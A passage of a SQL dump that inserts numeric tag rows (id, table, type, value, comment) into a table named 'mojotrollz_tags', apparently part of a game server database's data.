`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5732, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5732, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5733, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5733, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5733, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5733, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5733, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5734, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5734, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5734, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5734, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5734, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5735, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5735, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5735, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5735, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5735, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5736, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5736, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5736, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5736, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5738, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5739, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5741, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5742, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5743, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5744, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5744, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5744, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5744, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5744, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5747, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5747, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5747, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5747, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5747, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5748, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5748, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5749, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5749, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5750, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5750, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5752, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5752, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5753, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5753, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5753, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5753, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5753, 1, 31, 5, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5753, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5753, 1, 33, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5753, 1, 35, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5754, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5754, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5754, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5754, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5754, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5755, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5755, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5755, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5756, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5756, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5756, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5757, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5757, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5758, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5758, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5759, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5759, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5760, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5760, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5761, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5761, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5761, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5762, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5763, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5764, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5765, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5765, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5765, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5766, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5766, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5766, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5766, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5766, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5767, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5767, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5768, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5768, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5769, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5769, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5770, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5770, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5771, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5771, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5772, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5773, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5774, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5774, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5774, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5774, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5774, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5775, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5775, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5775, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5780, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5782, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5782, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5783, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5784, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5785, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5785, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5786, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5786, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5787, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5787, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5791, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5792, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5792, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5797, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5797, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5798, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5798, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5799, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5799, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5800, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5800, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5806, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5806, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5807, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5807, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5808, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5808, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5808, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5809, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5809, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5809, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5810, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5810, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5811, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5811, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5811, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5811, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5811, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5811, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5812, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5812, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5812, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5812, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5812, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5812, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5814, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5814, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5815, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5815, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5815, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5815, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5815, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5815, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5816, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5816, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5816, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5816, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5816, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5816, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5817, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5817, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5817, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5817, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5817, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5817, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5819, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5819, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5819, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5819, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5819, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5820, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5820, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5820, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5820, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5820, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5821, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5821, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5821, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5821, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5821, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5822, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5822, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5823, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5823, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5824, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5824, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5824, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5824, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5824, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5824, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5826, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5826, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5827, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5827, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5828, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5828, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5829, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5829, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5830, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5830, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5830, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5830, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5830, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5831, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5831, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5832, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5832, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5833, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5833, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5834, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5834, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5835, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5835, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5835, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5835, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5835, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5836, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5836, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5836, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5836, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5836, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5837, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5837, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5838, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5838, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5838, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5838, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5838, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 